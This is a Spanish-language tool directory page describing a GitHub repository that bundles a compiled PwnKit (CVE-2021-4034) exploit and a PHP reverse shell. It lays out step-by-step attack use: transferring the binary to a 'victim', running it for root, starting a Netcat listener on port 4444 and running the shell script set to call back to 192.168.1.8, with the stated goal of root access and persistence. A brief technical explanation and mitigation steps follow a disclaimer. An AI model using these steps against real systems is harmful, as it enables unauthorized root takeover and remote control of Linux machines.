Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
hack — Repositorio de investigación de seguridad que contiene una Prueba de Concepto (PoC) para la vulnerabilidad CVE-2021-4034 (PwnKit) y utilidades de scripting para la demostración de escalada de privilegios y ejecución remota en entornos Linux. | Kitploit
Herramientas/GitHubGitHub/jscamposx/hack
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónAprendizaje y EducaciónHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubjscamposx/hack

hack

Repositorio de investigación de seguridad que contiene una Prueba de Concepto (PoC) para la vulnerabilidad CVE-2021-4034 (PwnKit) y utilidades de scripting para la demostración de escalada de privilegios y ejecución remota en entornos Linux.

Ver Repositorio
16hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

💀 PwnKit (CVE-2021-4034) & Reverse Shell Toolkit

Security Research CVE Language

⚠️ DISCLAIMER: Este repositorio ha sido creado únicamente con fines educativos y de investigación de seguridad. El autor no se hace responsable del mal uso de estas herramientas. Úsalo solo en entornos controlados o donde tengas permiso explícito.


📜 Descripción

Este repositorio contiene una Prueba de Concepto (PoC) compilada para la vulnerabilidad PwnKit (CVE-2021-4034), una falla crítica de escalada de privilegios local en el componente pkexec de Polkit.

Además, se incluye un script de Reverse Shell en PHP listo para ser desplegado tras la explotación o como vector de acceso inicial.

🎯 Objetivo

Lograr acceso root en sistemas Linux vulnerables y establecer persistencia o control remoto mediante una shell inversa.


📂 Contenido del Arsenal

1. PwnKit (ELF Binary)

El exploit compilado para CVE-2021-4034.

  • Función: Manipula las variables de entorno de pkexec para cargar una librería compartida maliciosa y ejecutar código como root.
  • Arquitectura: x86_64 (Linux).
  • Dependencias: Requiere que pkexec esté instalado en el objetivo.

2. reverseShell.php

Un payload ligero para establecer una conexión inversa.

  • Configuración actual:
    • IP: 192.168.1.8
    • Puerto: 4444
    • Shell: /bin/bash
  • Uso: Puede ser ejecutado vía CLI (php reverseShell.php) o inyectado en un servidor web vulnerable.

🚀 Guía de Uso

Fase 1: Escalada de Privilegios (PwnKit)

  1. Transfiere el binario PwnKit al sistema víctima.
  2. Dale permisos de ejecución:
    root@kitploit:~
    chmod +x PwnKit
    
  3. Ejecuta el exploit:
    root@kitploit:~
    ./PwnKit
    
    Si es exitoso, deberías obtener una shell con privilegios de root inmediatamente.

Fase 2: Conexión Remota (Reverse Shell)

  1. En tu máquina atacante, inicia un listener con Netcat:
    root@kitploit:~
    nc -lvnp 4444
    
  2. Edita reverseShell.php si tu IP es diferente a la configurada por defecto.
  3. Ejecuta el script en la víctima (como usuario normal o como root tras usar PwnKit):
    root@kitploit:~
    php reverseShell.php
    

🛠️ Detalles Técnicos (CVE-2021-4034)

Esta vulnerabilidad reside en cómo pkexec maneja los argumentos de la línea de comandos. Al pasar una lista de argumentos vacía, pkexec intenta acceder a argv[1] fuera de los límites, lo que permite a un atacante sobrescribir variables de entorno en la memoria, específicamente inyectando una variable GCONV_PATH maliciosa para secuestrar el flujo de ejecución.

  • Fecha de divulgación: Enero 2022.
  • Impacto: Acceso Root instantáneo en la mayoría de las distribuciones Linux por defecto (Ubuntu, Debian, Fedora, CentOS).

🛡️ Mitigación

Para protegerse contra este exploit:

  1. Actualizar Polkit: Instala los parches de seguridad proporcionados por tu distribución.
  2. Eliminar bit SUID (Solución temporal):
    root@kitploit:~
    chmod 0755 /usr/bin/pkexec
    

Happy Hacking! 🏴‍☠️

Descargar herramienta